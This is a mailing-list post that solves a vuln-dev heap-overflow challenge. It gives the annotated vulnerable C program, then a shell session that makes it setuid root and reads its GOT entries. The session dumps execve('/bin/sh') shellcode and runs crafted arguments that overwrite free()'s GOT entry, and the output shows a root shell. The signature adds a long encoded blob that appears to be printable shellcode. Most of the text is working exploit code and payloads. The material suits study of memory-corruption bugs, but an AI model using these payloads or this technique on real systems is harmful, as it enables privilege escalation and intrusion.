Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further..

matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadamsat_private>
// Spot the error in this program.
//
// Reviewer annotations (code left exactly as posted):
//  - strncpy() is called without <string.h>, so it is implicitly declared here.
//  - Neither malloc() result is checked.
//  - The copy loop below bounds i with `<=` instead of `<`, which is the off-by-one
//    that the rest of this post exploits.
#include <stdio.h>
#include <stdlib.h>

#define SIZE 252

int main(int argc, char *argv[])
{
    int i;
    char *p1, *p2;
    char *buf1 = malloc(SIZE);   // unchecked: NULL on allocation failure is written to below
    char *buf2 = malloc(SIZE);   // allocated right after buf1; unchecked as well

    if (argc != 3)
        exit(1);                 // early exit never frees buf1/buf2 (harmless here, process ends)

    p1 = argv[1], p2 = argv[2];

    printf("p1 is at %p\n", p1); // DEBUG -- prints a stack address (argv[1]) to whoever runs the
                                 // binary; the walkthrough below reuses this value, so a debug
                                 // print like this is itself an information leak in a setuid program
    strncpy(buf2, p2, SIZE);     // bounded, but when p2 is SIZE bytes or longer buf2 is left with no
                                 // NUL terminator; buf2 is never read here, so this is not the bug

    // BUG: the condition allows i == SIZE, so the last iteration writes buf1[252] -- one byte past
    // the 252-byte allocation. That byte comes straight from argv[1] (a single-byte heap overflow
    // into whatever follows buf1, presumably the allocator's header of the buf2 chunk). The fix is
    // `i < SIZE`, with explicit NUL termination if buf1 were ever used as a string.
    for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
        buf1[i] = p1[i];

    free(buf1);
    free(buf2);                  // free() now processes metadata the overflowed byte may have altered
    return 0;
}
matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root ./vuln1
matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1
matrix@overdose vuln-dev $ objdump -R ./vuln1
./vuln1: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049654 R_386_GLOB_DAT __gmon_start__
0804963c R_386_JUMP_SLOT malloc
08049640 R_386_JUMP_SLOT __libc_start_main
08049644 R_386_JUMP_SLOT printf
08049648 R_386_JUMP_SLOT exit
0804964c R_386_JUMP_SLOT free
08049650 R_386_JUMP_SLOT strncpy
matrix@overdose vuln-dev $ pcalc 0x4c-12
64 0x40 0y1000000
matrix@overdose vuln-dev $ od -ch shell
0000000 1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210 c031 46b0 db31 c931 80cd 16eb 315b 88c0
0000020 C \a 211 [ \b 211 C \f 260 \v 215 K \b 215 S \f 0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53
0000040 315 200 350 345 377 377 377 / b i n / s h 80cd e5e8 ffff 2fff 6962 2f6e 6873
0000056
matrix@overdose vuln-dev $ wc -c shell
46 shell
matrix@overdose vuln-dev $ pcalc 252-46
206 0xce 0y11001110
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"`
p1 is at 0xbffff839
Segmentation fault
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"`
p1 is at 0xbffff839
sh-2.05b# id uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b# questions? comments? >=) -- %JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP